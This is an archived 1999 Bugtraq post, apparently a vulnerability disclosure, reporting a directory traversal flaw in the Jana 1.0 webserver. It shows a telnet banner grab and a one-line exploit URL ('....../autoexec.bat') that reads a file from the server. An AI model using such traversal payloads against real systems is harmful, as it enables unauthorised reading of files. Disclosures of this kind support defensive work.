This is a multi-part message in MIME format. ------=_NextPart_000_0103_01BF116B.875AA220 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Bugtraq, I have found a security flaw in Jana 1.0 webserver. I have not been able = to find out any information on who makes this product nor a place to = download the web server package. This webserver seems to be included as = a suite of Internet services, one of witch I think is web-based chat. = Enclosed is one exploit I have found in the limited time that I have had = to deal with this web server. I am posting this information now so that = one of you might know who makes this software and how I might be able to = get in touch with them for further testing. .=20 [root@foo whis]# telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 200 OK Date: Mon, 04 Oct 1999 18:59:44 GMT Server: Jana Server/1.40 Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT Content-Length: 38 Content-Type: text/html Connection: close <HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host. [root@foo whis]# http://server/....../autoexec.bat Prints user's autoexec.bat I would like to say thank you to rain.forest.puppy. for all his help. Jason Lutz Sprint Print Inc jasonat_private ------=_NextPart_000_0103_01BF116B.875AA220 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV> <DIV>Bugtraq,</DIV> <DIV> </DIV> <DIV>I have found a security flaw in Jana 1.0 webserver. I have not been = able to=20 find out any information on who makes this product nor a place to = download the=20 web server package. This webserver seems to be included as a suite = of=20 Internet services, one of witch I think is web-based chat. Enclosed = is one=20 exploit I have found in the limited time that I have had to deal with = this web=20 server. I am posting this information now so that one of you might = know who=20 makes this software and how I might be able to get in touch with them = for=20 further testing.</DIV> <DIV> </DIV> <DIV>.=20 <DIV>[root@foo whis]# telnet x.x.x.x 80<BR>Trying = x.x.x.x...<BR>Connected=20 to x.x.x.x.<BR>Escape character is '^]'.<BR>GET / HTTP/1.0</DIV> <DIV> </DIV> <DIV>HTTP/1.0 200 OK<BR>Date: Mon, 04 Oct 1999 18:59:44 GMT<BR>Server: = Jana=20 Server/1.40<BR>Last-Modified: Mon, 04 Oct 1999 15:04:40 = GMT<BR>Content-Length:=20 38<BR>Content-Type: text/html<BR>Connection: close</DIV> <DIV> </DIV> <DIV><HTML><BODY><CENTER>TEST</BODY></HTML>= Connection=20 closed by foreign host.<BR>[root@foo whis]#</DIV> <DIV> </DIV> <DIV><A=20 href=3D"http://server/....../autoexec.bat">http://server/....../autoexec.= bat</A></DIV> <DIV> </DIV> <DIV>Prints user's autoexec.bat</DIV> <DIV> </DIV> <DIV> </DIV> <DIV>I would like to say thank you to rain.forest.puppy. for all his = help.</DIV> <DIV> </DIV> <DIV> </DIV> <DIV>Jason Lutz</DIV> <DIV>Sprint Print Inc</DIV> <DIV><A href=3D"mailto:jasonat_private">jasonat_private</A></DIV> <DIV> </DIV></DIV></DIV></BODY></HTML> ------=_NextPart_000_0103_01BF116B.875AA220--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:06:58 PDT